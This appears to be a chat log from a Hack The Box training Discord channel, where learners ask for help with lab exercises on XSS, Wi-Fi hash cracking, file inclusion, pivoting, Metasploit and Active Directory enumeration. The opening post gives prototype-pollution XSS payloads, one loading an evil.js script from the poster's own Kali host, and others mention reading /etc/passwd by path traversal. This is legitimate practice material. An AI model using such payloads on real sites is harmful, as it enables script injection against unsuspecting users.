I have a locally working XSS payloads like these:

||http://94.237.57.115:55298/profile.php?__proto__[src][]=data:,alert(1)//

And

http://94.237.57.115:55298/profile.php?__proto__[src][]=http://127.0.0.1/evil.js ||

But when I try to trigger the admin for example to fetch or doing a request to my python server I don't get any request back.

For example I tried sending this to admin:

||/profile.php?__proto__[src][]=http://MY-KALI-IP/evil.js||

and I had zero coming requests.

magic timber
#

Hello, someone could help me on the skill assesments of the 'Wi-Fi Password Cracking Techniques' module? im totally stuck at the begining and its kind of frustating

gray yacht
autumn pilot
magic timber
autumn pilot
#

try and see

magic timber
# autumn pilot try and see

i suceeded ty, for the second one i'm using what i learned before trying to crack the fash of the handshake using already existing rules from hashcat and rockyou, but it doesn't seem to work after long time, so idk if im missing something

autumn pilot
#

there are available rule files (rules) on the target in the /opt directory

magic timber
#

oh ty didn't see at all, happy to see i was on the good way, cracked it in 1 sec

opaque dew
#

hi, i'm trying to do the very first question in local file inclusion but i'm confused... what i believe is the correct solution causes the page to load forever instead. is this a bug in the module or am i just doing it wrong?

magic timber
fathom pendant
magic timber
opaque dew
#

it's just path traversal to read /etc/passwd

#

i was able to do path traversal up two levels but once i hit (presumably) /var it begins loading infinitely

opaque dew
#

i'm convinced that this issue is a bug in the module since i just did the next task in the module and it was successful

robust pecan
#

Problem: I can’t make the nmap static binary work.

Guys, I am doing AEN and I read the section that suggests transferring an nmap static binary. I spent a few hours last night trying to make it work, but it didn’t. Can someone help?

grizzled schooner
#

Any HTB Staff available for VPN help? please @ with responses

acoustic owl
grizzled schooner
#

Ty

heady sapphire
#

Hello ! I am in pivoting module , in dynamic port forwarding section and I do the dynamic port forwarding as shown in the course but when I try to connect to the target using proxychains xfreerdp I get error about Kerberos and then proxychains timed out

rich obsidian
#

This is pertaining to the metasploit module in the cpts path. I got the shell, but something strange happened that I havent seen in metasploit before where I executed the exploit and it gave me "exploit aborted due to failure: unexpected reply: the server replied to the trigger in an unexpected way. Exploit completed but no session was created." Then it tells me after closing that dialog that a shell session was opened with the target. Is it common to get a sort of "delay" in metasploit when it pertains to shells? I would post screenshots but I believe it would expose the answer to the module. Just know that I got the shell session opened output on the same line as my prompt, not in the output of my exploit

rustic sage
#

hi

#

i am newbie

#

i am from VietNam

#

This is pertaining to the metasploit module in the cpts path. I got the shell, but something strange happened that I havent seen in metasploit before where I executed the exploit and it gave me "exploit aborted due to failure: unexpected reply: the server replied to the trigger in an unexpected way. Exploit completed but no session was created." Then it tells me after closing that dialog that a shell session was opened with the target. Is it common to get a sort of "delay" in metasploit when it pertains to shells? I would post screenshots but I believe it would expose the answer to the module. Just know that I got the shell session opened output on the same line as my prompt, not in the output of my exploit

rich obsidian
#

hmmmm russian username, from "VietNam"

hasty mauve
#

Active Directory LDAP > Skills Assessment

Question

What is the name of the computer that starts with RD? (Submit the FQDN in all capital letters)

My Command

Get-ADComputer -Filter "Name -like 'RD*'"

Output

DistinguishedName : CN=RDS01,CN=Computers,DC=INLANEFREIGHTENUM1,DC=LOCAL
DNSHostName       :
Enabled           : True
Name              : RDS01
ObjectClass       : computer
ObjectGUID        : c6d31ef7-5584-4ba3-ad91-40d98e872ebb
SamAccountName    : RDS01$
SID               : S-1-5-21-1572947012-227590625-1650757115-1803
UserPrincipalName :

I tried RDS01, RDS01.INLANEFREIGHT.LOCAL, CN=RDS01,CN=Computers,DC=INLANEFREIGHTENUM1,DC=LOCAL, and RDS01$.
None of them worked.

#

Any help would be appreciated.

rich obsidian
#

is there a subdomain?

hasty mauve
#

I just tried three more things
RDS01$.INLANEFREIGHT.LOCAL, INLANEFREIGHT\RDS01, and INLANEFREIGHT.LOCAL\RDS01.
Still nothing worked.

#

LOL nevermind.

#

I just noticed that the domain is not INLANEFREIGHT but INLANEFREIGHTENUM1.

rich obsidian
#

i was thinking it had to be a FQDN problem

#

because you were for sure right